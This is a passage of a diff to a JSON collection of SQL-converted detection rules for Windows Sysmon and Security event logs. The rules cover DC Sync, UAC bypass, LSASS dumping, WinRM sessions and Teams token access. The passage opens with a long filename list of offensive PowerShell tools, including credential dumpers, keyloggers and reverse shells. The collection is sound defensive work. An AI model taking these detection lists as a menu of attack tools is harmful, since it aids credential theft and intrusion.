'%\\\\Find-TrustedDocuments.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireBuster.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireListener.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ApplicationHost.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ChromeDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ClipboardContents.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ComputerDetail.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-FoxDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPAutologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-IndexedItem.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Keystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-LSASecret.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-MicrophoneAudio.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHashes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHints.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAlwaysInstallElevated.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAutoLogon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RickAstley.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Screenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SecurityPackages.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceFilePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServicePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceUnquoted.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SiteListPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-System.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-TimedScreenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-UnattendedInstallFile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Unconstrained.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-USBKeystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VaultCredential.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnAutoRun.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnSchTask.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebConfig.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebCredentials.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WLAN-Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Gupt-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Login.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-ServiceBinary.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-SSP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ACLScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ADSBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-AmsiBypass.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ARPScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BackdoorLNK.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BadPotato.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BetterSafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BruteForce.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Carbuncle.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Certify.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ConPtyShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialsPhish.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DAFT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DCSync.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Decode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DinvokeKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DllInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DowngradeAccount.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EgressCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Encode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EventViewer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Eyewitness.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-FakeLogonScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Farmer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Get-RBCD-Threaded.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Gopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper2.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper3.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-HandleKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Interceptor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Internalmonologue.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-InveighRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRegsvr.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRundll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelayUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-LdapSignCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Lockless.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MalSCCM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MimikatzWDigestDowngrade.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikittenz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MITM6.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NanoDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetRipper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetworkRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NinjaCopy.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-OxidResolver.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshellx86.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Paranoia.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PortScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttps.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PostExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellIcmp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTCP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLineBind.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerThIEf.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PPLDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Prasadhak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcatAgent.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PSInject.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsUaCme.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReflectivePEInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReverseDNSLookup.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Rubeus.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-RunAs.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SauronEye.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SCShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Seatbelt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ServiceAbuse.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SessionGopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ShellCode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SMBScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Snaffler.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Spoolsample.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSHCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSIDExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StandIn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StickyNotesExtract.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tater.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Thunderfox.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ThunderStruck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TokenManipulation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tokenvator.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TotalExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UrbanBishop.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UserHunter.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-VoiceTroll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Whisker.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WinEnum.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-winPEAS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WireTap.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WmiCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WScriptBypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Zerologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Keylogger.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\MailRaider.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\New-HoneyHash.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\OfficeMemScraper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Offline\\_Winpwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-CHM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-DnsTxt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Excel.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-HTA.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Java.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-JS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Minidump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-RundllCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCF.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Shortcut.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-WebQuery.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Word.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Parse\\_Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Port-Scan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerBreach.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powercat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerRunAsSystem.psm1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerSharpPack.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUpSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerView.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PSAsyncShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RemoteHashRetrieval.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-PoshRat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Update.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Run-EXEonRemote.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Schtasks-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-DCShadowPermissions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-MacAttribute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemotePSRemoting.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemoteWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-Wallpaper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Show-TargetScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Speak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-CaptureServer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-WebcamRecorder.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\StringToBase64.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TexttoExe.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VolumeShadowCopyTools.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinPwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSUSpendu.ps1' ESCAPE '\\') OR (TargetFilename LIKE '%Invoke-Sharp%' ESCAPE '\\' AND TargetFilename LIKE '%.ps1' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND TargetUserName = 'ANONYMOUS LOGON' AND WorkstationName = '-' AND IpAddress IN ('127.0.0.1', '::1'))" ], - "filename": "file_event_win_powershell_exploit_scripts.yml" + "filename": "win_security_susp_rottenpotato.yml" }, { - "title": "UAC Bypass Using IDiagnostic Profile - File", - "id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", + "title": "Mimikatz DC Sync", + "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", "status": "experimental", - "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Mimikatz DC sync security events", + "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.s0002", + "attack.t1003.006" ], "falsepositives": [ - "Unknown" + "Valid DC Sync that is not covered by the filters; please report", + "Local Domain Admin account used for Azure AD Connect" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND (Properties LIKE '%Replicating Directory Changes All%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%9923a32a-3607-11d2-b9be-0000f87a36b2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\') AND AccessMask = '0x100') AND NOT ((SubjectDomainName = 'Window Manager') OR ((SubjectUserName LIKE 'NT AUT%' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\')) OR (SubjectUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml" + "filename": "win_security_dcsync.yml" }, { - "title": "Potential Winnti Dropper Activity", - "id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", + "title": "Remote PowerShell Sessions Network Connections (WinRM)", + "id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", "status": "test", - "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", - "author": "Alexander Rausch", + "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of remote PowerShell execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\gthread-3.6.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sigcmm-2.4.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5156' AND DestPort IN ('5985', '5986') AND LayerRTID = '44')" ], - "filename": "file_event_win_redmimicry_winnti_filedrop.yml" + "filename": "win_security_remote_powershell_session.yml" }, { - "title": "WScript or CScript Dropper - File", - "id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", + "title": "Invoke-Obfuscation STDIN+ Launcher - Security", + "id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", "status": "experimental", - "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", - "author": "Tim Shelton", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\ProgramData%' ESCAPE '\\') AND (TargetFilename LIKE '%.jse' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.vba' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\' AND (ServiceFileName LIKE '%${input}%' ESCAPE '\\' OR ServiceFileName LIKE '%noexit%' ESCAPE '\\') AND (ServiceFileName LIKE '% /c %' ESCAPE '\\' OR ServiceFileName LIKE '% /r %' ESCAPE '\\'))" ], - "filename": "file_event_win_cscript_wscript_dropper.yml" + "filename": "win_security_invoke_obfuscation_stdin_services_security.yml" }, { - "title": "PSEXEC Remote Execution File Artefact", - "id": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", + "title": "Suspicious Teams Application Related ObjectAcess Event", + "id": "25cde13e-8e20-4c29-b949-4e795b76f16f", "status": "experimental", - "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.execution", - "attack.persistence", - "attack.t1136.002", - "attack.t1543.003", - "attack.t1570", - "attack.s0029" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\PSEXEC-%' ESCAPE '\\' AND TargetFilename LIKE '%.key' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND (ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\')) AND NOT (ProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" ], - "filename": "file_event_win_psexec_service_key.yml" + "filename": "win_security_teams_suspicious_objectaccess.yml" }, { - "title": "PCRE.NET Package Temp Files", - "id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", + "title": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", + "id": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", "status": "test", - "description": "Detects processes creating temp files related to PCRE.NET package", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", + "author": "Orlinum , BlueDefenZer", "tags": [ - "attack.execution", - "attack.t1059" + "attack.privilege_escalation", + "attack.credential_access" ], "falsepositives": [ - "Unknown" + "Administrator activity", + "Proxy SSL certificate with subject modification", + "Smart card enrollement" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND (TemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR TemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND (NewTemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" ], - "filename": "file_event_win_pcre_net_temp_file.yml" + "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" }, { - "title": "Moriya Rootkit", - "id": "a1507d71-0b60-44f6-b17c-bf53220fdd88", - "status": "test", - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "author": "Bhabesh Raj", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ], + "title": "Password Protected ZIP File Opened (Suspicious Filenames)", + "id": "54f0434b-726f-48a1-b2aa-067df14516e4", + "status": "experimental", + "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate used of encrypted ZIP files" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\drivers\\\\MoriyaStreamWatchmen.sys' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND (TargetName LIKE '%invoice%' ESCAPE '\\' OR TargetName LIKE '%new order%' ESCAPE '\\' OR TargetName LIKE '%rechnung%' ESCAPE '\\' OR TargetName LIKE '%factura%' ESCAPE '\\' OR TargetName LIKE '%delivery%' ESCAPE '\\' OR TargetName LIKE '%purchase%' ESCAPE '\\' OR TargetName LIKE '%order%' ESCAPE '\\' OR TargetName LIKE '%payment%' ESCAPE '\\'))" ], - "filename": "file_event_win_moriya_rootkit.yml" + "filename": "win_security_susp_opened_encrypted_zip_filename.yml" }, { - "title": "LSASS Process Memory Dump Files", - "id": "a5a2d357-1ab8-4675-a967-ef9990a59391", - "status": "experimental", - "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created", + "id": "1bbf25b9-8038-4154-a50b-118f2a32be27", + "status": "test", + "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", + "author": "James Pemberton / @4A616D6573", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1136.001", + "attack.t1136.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\lsass.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.rar' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Temp\\\\dumpert.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Andrew.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Coredump.dmp' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass\\_2%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdmp%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\') OR (TargetFilename LIKE '%SQLDmpr%' ESCAPE '\\' AND TargetFilename LIKE '%.mdmp' ESCAPE '\\') OR (TargetFilename LIKE 'nanodump%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')))" + "SELECT 